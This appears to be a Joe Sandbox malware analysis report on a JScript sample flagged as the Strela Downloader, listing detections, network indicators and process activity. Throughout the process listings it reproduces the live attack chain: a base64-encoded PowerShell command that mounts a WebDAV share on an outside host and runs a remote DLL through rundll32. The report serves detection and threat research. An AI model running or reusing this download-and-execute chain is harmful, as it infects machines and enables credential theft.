Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1267026769116073766.js

Overview

General Information

Sample name:1267026769116073766.js
Analysis ID:1541877
MD5:5ad771c388e585c3006f7b2b35b35f12
SHA1:7530f9e093674e619c68c4f0201e44f5489218ac
SHA256:fed183856e7f09bb9f73d8c9d57bd3573ec846da1a49dc1eeb295c845007f5a2
Tags:jsStrelaStealeruser-lowmal3
Infos:

Detection

Strela Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 6940 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 2052 cmdline: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 1060 cmdline: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3792JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3792.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3792, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry, ProcessId: 1060, ProcessName: rundll32.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", ProcessId: 6940, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.48, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 2052, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49772
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6940, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 3792, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", ProcessId: 6940, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6940, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 3792, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3792, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, ProcessId: 2052, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3792, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\, ProcessId: 2052, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: 1267026769116073766.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4A']Go to definition
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49772
      Source: global trafficTCP traffic: 192.168.2.6:49772 -> 94.159.113.48:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.48 94.159.113.48
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: endpointexperiment.com
      Source: net.exe, 00000004.00000003.2319287415.00000215C30FF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2319698741.00000215C30E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://endpointexperiment.com:8888/
      Source: powershell.exe, 00000002.00000002.2324639377.00000214DC041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2324639377.00000214DC05B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
      Source: powershell.exe, 00000002.00000002.2324639377.00000214DC0AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_3792.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3792, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347327732_2_00007FFD34732773
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347325BD2_2_00007FFD347325BD
      Source: 1267026769116073766.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqujersa.nnw.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
